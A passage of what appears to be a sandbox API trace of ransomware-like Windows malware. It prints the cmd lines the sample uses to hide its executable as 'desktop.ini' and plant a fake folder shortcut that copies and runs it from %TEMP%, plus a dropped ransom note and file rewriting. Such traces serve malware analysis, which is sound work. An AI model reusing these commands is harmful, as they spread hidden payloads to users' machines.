[0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.261] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0224.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0224.261] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE 
\"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0224.261] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0224.261] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.262] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa14, dwThreadId=0x7f8)) returned 1 [0224.278] CloseHandle (hObject=0x120) returned 1 [0224.278] CloseHandle (hObject=0x1b4) returned 1 [0224.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf")) returned 0xffffffff [0224.278] GetLastError () returned 0x2 
[0224.278] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0224.288] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf")) returned 0x20 [0224.288] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.288] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0224.289] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0224.289] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0224.289] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0224.289] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.289] CharUpperBuffW (in: lpsz="attrib 
-r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0224.289] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y") returned 0x1d [0224.290] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0224.290] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0224.290] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h 
\"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc84, dwThreadId=0xdac)) returned 1 [0224.419] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0226.386] CloseHandle (hObject=0x1b4) returned 1 [0226.386] CloseHandle (hObject=0x120) returned 1 [0226.386] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0226.386] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0226.386] GetTickCount () returned 0x3e780 [0226.386] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28317542117) returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.387] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.387] CharUpperBuffW (in: lpsz="explorer.exe 
\"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0226.387] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0226.387] CharUpperBuffW (in: lpsz="explorer.exe \"Lp6Y\" & type \"Lp6Y\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"LP6Y\" & TYPE \"LP6Y\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0226.387] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0226.387] CharUpperBuffW (in: lpsz="explorer.exe \"Lp6Y\" & type \"Lp6Y\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"LP6Y\" & TYPE \"LP6Y\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0226.387] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0226.387] CoInitialize (pvReserved=0x0) returned 0x0 [0226.387] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0226.389] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0226.389] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 
[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0226.389] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Lp6Y\" & type \"Lp6Y\\desktop.ini\" > \"%TEMP%\\xAq6pxJv.exe\" && \"%TEMP%\\xAq6pxJv.exe\"") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0226.391] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0226.391] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y.lnk", fRemember=0) returned 0x0 [0226.777] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0226.777] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0226.777] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0226.777] CoUninitialize () [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 
[0226.778] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.778] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.779] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.779] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28357192124) returned 1 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8deb [0226.783] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x8903 [0226.784] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0226.789] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8deb [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8deb [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0226.789] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x46f4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0226.790] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x46f4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-18164, lpDistanceToMoveHigh=0x12ec78*=-1, 